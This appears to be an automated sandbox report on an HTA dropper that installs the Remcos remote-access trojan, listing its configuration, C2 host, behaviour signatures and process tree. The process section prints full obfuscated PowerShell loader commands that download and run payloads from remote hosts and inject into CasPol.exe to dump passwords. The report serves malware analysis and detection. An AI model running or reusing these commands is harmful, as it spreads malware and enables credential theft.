Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-01-2025 16:04
Behavioral task
behavioral1
Sample
24d95803236fde4ee8ebfe4671dc28fe.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
24d95803236fde4ee8ebfe4671dc28fe.hta
Resource
win10v2004-20241007-en
General
-
Target
24d95803236fde4ee8ebfe4671dc28fe.hta
-
Size
1.2MB
-
MD5
24d95803236fde4ee8ebfe4671dc28fe
-
SHA1
677e9c8b79a59b4fa3c8eab8fd318ae31dcd5d95
-
SHA256
986b693f564b364a2f69261f1f825d6a26afec8db9a3aa46fd2a964e45dc2a1c
-
SHA512
272adc89c2eedbfd065e3fa54edcb27211db44b998f3e5479cc53c6954c0b37db16e6d2eac0977c040068da07da651f8d9adc440d97e65bbdcb53afb0c4670a0
-
SSDEEP
768:tJnbjKx80AIu6GTs1A5fRgd4m2hX3IpXj1x+mLvGNtGLN0Go5cLzLWpXj1x5aGIA:tt
Malware Config
Extracted
remcos
RemoteHost
abeangana.duckdns.org:1121
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-B9B8CE
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/2576-106-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/4812-105-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/2240-103-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/2240-103-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/2576-106-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 3 IoCs
flow pid Process 15 3100 powershell.exe 21 4424 powershell.exe 22 4424 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 3100 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
pid Process 4424 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4424 set thread context of 1716 4424 powershell.exe 100 PID 1716 set thread context of 2576 1716 CasPol.exe 106 PID 1716 set thread context of 2240 1716 CasPol.exe 107 PID 1716 set thread context of 4812 1716 CasPol.exe 108 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 3100 powershell.exe 3100 powershell.exe 4424 powershell.exe 4424 powershell.exe 2576 CasPol.exe 2576 CasPol.exe 4812 CasPol.exe 4812 CasPol.exe 2576 CasPol.exe 2576 CasPol.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1716 CasPol.exe 1716 CasPol.exe 1716 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3100 powershell.exe Token: SeDebugPrivilege 4424 powershell.exe Token: SeDebugPrivilege 4812 CasPol.exe -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 1224 wrote to memory of 3968 1224 mshta.exe 83 PID 1224 wrote to memory of 3968 1224 mshta.exe 83 PID 1224 wrote to memory of 3968 1224 mshta.exe 83 PID 3968 wrote to memory of 3100 3968 cmd.exe 85 PID 3968 wrote to memory of 3100 3968 cmd.exe 85 PID 3968 wrote to memory of 3100 3968 cmd.exe 85 PID 3100 wrote to memory of 5076 3100 powershell.exe 87 PID 3100 wrote to memory of 5076 3100 powershell.exe 87 PID 3100 wrote to memory of 5076 3100 powershell.exe 87 PID 5076 wrote to memory of 4348 5076 csc.exe 88 PID 5076 wrote to memory of 4348 5076 csc.exe 88 PID 5076 wrote to memory of 4348 5076 csc.exe 88 PID 3100 wrote to memory of 4612 3100 powershell.exe 94 PID 3100 wrote to memory of 4612 3100 powershell.exe 94 PID 3100 wrote to memory of 4612 3100 powershell.exe 94 PID 4612 wrote to memory of 4424 4612 WScript.exe 95 PID 4612 wrote to memory of 4424 4612 WScript.exe 95 PID 4612 wrote to memory of 4424 4612 WScript.exe 95 PID 4424 wrote to memory of 1716 4424 powershell.exe 100 PID 4424 wrote to memory of 1716 4424 powershell.exe 100 PID 4424 wrote to memory of 1716 4424 powershell.exe 100 PID 4424 wrote to memory of 1716 4424 powershell.exe 100 PID 4424 wrote to memory of 1716 4424 powershell.exe 100 PID 4424 wrote to memory of 1716 4424 powershell.exe 100 PID 4424 wrote to memory of 1716 4424 powershell.exe 100 PID 4424 wrote to memory of 1716 4424 powershell.exe 100 PID 4424 wrote to memory of 1716 4424 powershell.exe 100 PID 4424 wrote to memory of 1716 4424 powershell.exe 100 PID 1716 wrote to memory of 2576 1716 CasPol.exe 106 PID 1716 wrote to memory of 2576 1716 CasPol.exe 106 PID 1716 wrote to memory of 2576 1716 CasPol.exe 106 PID 1716 wrote to memory of 2576 1716 CasPol.exe 106 PID 1716 wrote to memory of 2240 1716 CasPol.exe 107 PID 1716 wrote to memory of 2240 1716 CasPol.exe 107 PID 1716 wrote to memory of 2240 1716 CasPol.exe 107 PID 1716 wrote to memory of 2240 1716 CasPol.exe 107 PID 1716 wrote to memory of 4812 1716 CasPol.exe 108 PID 1716 wrote to memory of 4812 1716 CasPol.exe 108 PID 1716 wrote to memory of 4812 1716 CasPol.exe 108 PID 1716 wrote to memory of 4812 1716 CasPol.exe 108
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\24d95803236fde4ee8ebfe4671dc28fe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c PowerShELL -eX bYpass -nOp -W 1 -C dEvIceCREDeNtiALDEpLoYMeNt.eXe ; IEX($(ieX('[SysTem.TEXT.ENCOdINg]'+[CHaR]58+[CHAR]0x3a+'UTF8.gEtsTRING([sYSteM.convert]'+[ChAr]0X3a+[cHAr]58+'fROmbaSe64STRING('+[chAr]34+'JDFBeDhTWjJQTDEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQkVSREVmSU5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNpd0dacUh1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDd01TSG4sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkSCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT0NEZEVXcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVlUVHFEbnRtIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtRSnd1cFpDaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxQXg4U1oyUEwxOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ1LjIzOS4yOS4xMi8yMjUvbmljZWdpcmxmcm5kZ2l2ZW5tZWJlc3R0aGluZ3Nmb3JnLmdJRiIsIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMiLDAsMCk7c1RBUlQtc2xFZXAoMyk7aU52b0tFLUV4cFJFc3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMi'+[CHAr]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowerShELL -eX bYpass -nOp -W 1 -C dEvIceCREDeNtiALDEpLoYMeNt.eXe ; IEX($(ieX('[SysTem.TEXT.ENCOdINg]'+[CHaR]58+[CHAR]0x3a+'UTF8.gEtsTRING([sYSteM.convert]'+[ChAr]0X3a+[cHAr]58+'fROmbaSe64STRING('+[chAr]34+'JDFBeDhTWjJQTDEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQkVSREVmSU5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNpd0dacUh1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDd01TSG4sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkSCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT0NEZEVXcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVlUVHFEbnRtIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtRSnd1cFpDaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxQXg4U1oyUEwxOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ1LjIzOS4yOS4xMi8yMjUvbmljZWdpcmxmcm5kZ2l2ZW5tZWJlc3R0aGluZ3Nmb3JnLmdJRiIsIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMiLDAsMCk7c1RBUlQtc2xFZXAoMyk7aU52b0tFLUV4cFJFc3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMi'+[CHAr]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gqf0sljy\gqf0sljy.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1354.tmp" "c:\Users\Admin\AppData\Local\Temp\gqf0sljy\CSC638A014187454419A0BF936C8B497AC.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:4348
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicegirlfrndgivenmebesnicegirlfrndgivenmebes.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAGEAeAB3AHUAYQA2ADMAeQAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwA3ADUANAA0ADAANgAzAC8AMQBuAGUAdwBfAGkAbQBhAGcAZQBfAG4AagBwADAAeQByAC4AagBwAGcAJwA7ACAAdAByAHkAIAB7ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJABtAGUAdABoAG8AZAAgAD0AIABbAFIAdQBtAHAALgBDAGwAYQBzAHMAOQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHMAbQBlAHQAaABvAGQAXwAyACcAKQA7ACAAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdAEAAKAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAdABhAGUAcgBnAGgAdABpAHcAcwBnAG4AaQBoAHQAZABvAG8AZwB0AHMAZQBiAC8ANQAyADIALwAyADEALgA5ADIALgA5ADMAMgAuADUANAAxAC8ALwA6AHAAdAB0AGgAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBmAGEAbABzAGUAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBFAHIAcgBvADoAIAAkAF8AJwA7ACAAfQA=')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\fsbrynvdfbzigyltglxx"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2576
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\pmhczggftjrmqezxxwkzkkur"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:2240
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\spmuzyqzhrjzslvbgheavpoiuwd"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
19KB
MD5b97c19ccc5f657fbcb4447a5e78811ec
SHA1d91182177136d3fbba512b56bf7636b4e404b83d
SHA256a160883496ec3a9fecb78b02a43bd0a963882df913956499fd1a2a2a11e4be7e
SHA51219301ef62817c1b598af6b23950e22b4bd531186bca158b5d68a2371ef4e9ca1097135e7333d15f70d15dd93ab592c8b3bd0be801cf634ff0ff3055b598f2f62
-
Filesize
1KB
MD5666a77b9f6de710e9da975905290dce4
SHA125ba09ee5feb2a1af2252ebd1473fcd1b7d6e0e7
SHA256a7e5ef90df3ec9a72b364a1c939221d91f3f1714903a703475c2a0ddf5cb6997
SHA5121d9d2cbefe6c830300b10ec9336f062a5ec49ff0b195ca2329730228fe755aede45925174e957cc11a8e3d51d849f5a0bad7417d4222e233b006030224820c2b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD517eece3240d08aa4811cf1007cfe2585
SHA16c10329f61455d1c96e041b6f89ee6260af3bd0f
SHA2567cc0db44c7b23e4894fe11f0d8d84b2a82ad667eb1e3504192f3ba729f9a7903
SHA512a7de8d6322410ec89f76c70a7159645e8913774f38b84aafeeeb9f90dc3b9aa74a0a280d0bb6674790c04a8ff2d059327f02ebfda6c4486778d53b7fc6da6370
-
Filesize
3KB
MD54f4416cad7ea870d3bf9d26138ed895e
SHA166ae9df0f7da9afa85f0bb14d7f6dd784b2df8ba
SHA256164b66c342a249eaae86e932112603d8b182c40ad915c99e6457ad3e7160232a
SHA512cd28c0f3952106f6d6195438efdb73263dc092c1f1225e91e73c82bdd221693eb96f3bff6bb8484e4b4a0765fe6f89d1370c4fca8da5731f6eab7b7e6bcae830
-
Filesize
205KB
MD50e3b19cc6060bed0436e01fe8bc04c44
SHA18b99c60c35d7650ed451e3996bcccb7e9f51b7cf
SHA25635315b1e950898c156611a9074ea43debd10d09098b855e9bfba76eef6ec3d17
SHA512ad3267ee13123bebd28cee00cb2e128f0bf6213520378b5a45aa9d31b858f140612e2e6aee5d62be3a187af7c004de10ae1f0930e8133dc71c93f011fbde29e2
-
Filesize
652B
MD5e506f295267a4d3ece55075cb0447af1
SHA1a2d3ee05ecbeadac5c84668f726d55770ed92fd6
SHA256a18d9655be7d61a29bcc9ce36c6e1bc6e89bbe2b91787ac941609f314b547285
SHA51287a465e43dd149188bc9e9e58811c9c7c56d42f54fb1f0530bc850c4889c566d64b756f79e65669821bc0983cebce83c5fd1a401fdf51abd4a6c5c8ece3b21a9
-
Filesize
486B
MD53b886b3aeeb8599b37fc0be4fe6ae9d8
SHA1b6d0a2488bd50c1b7f96cae0e91bdc3a083a5a7e
SHA256b1dece05fc9ac39567b6cd75ae891827264b7d3606d5996807f1e88840e2c33e
SHA512ecc3d89869a074e00b7dbb0c3fbe07fd534cb2a100ef6280ffc3f02f66ace38526746761b216061e5d7d519f0b685a1b89a2f51c4e24d8ee900b77b949268458
-
Filesize
369B
MD59fd4a581c720cdfe8ac7e7e251186814
SHA1a49499cde0dcdb943eda989f6df307259d3a76ea
SHA2569598dbaf5923b39dff6488d34de94a3e1fb84059464cc4d6fa5601269e6675bb
SHA512bef14828247a79e02696875878a5c6a3f98a2e6dcaf423d20db18e00ade9148a0f27e31f1102a2761080b4fc6486c42f3418c2e5e29c56d39a3086687c60cd3e